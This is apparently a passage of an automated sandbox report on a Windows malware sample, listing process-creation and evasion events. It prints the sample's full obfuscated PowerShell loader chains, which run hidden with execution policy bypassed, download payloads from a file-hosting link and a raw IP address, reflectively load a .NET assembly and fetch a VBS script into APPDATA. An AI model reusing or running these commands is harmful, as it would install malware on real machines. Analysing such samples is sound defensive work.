uZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04C05665 push eax; iretd 3_2_04C05699
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
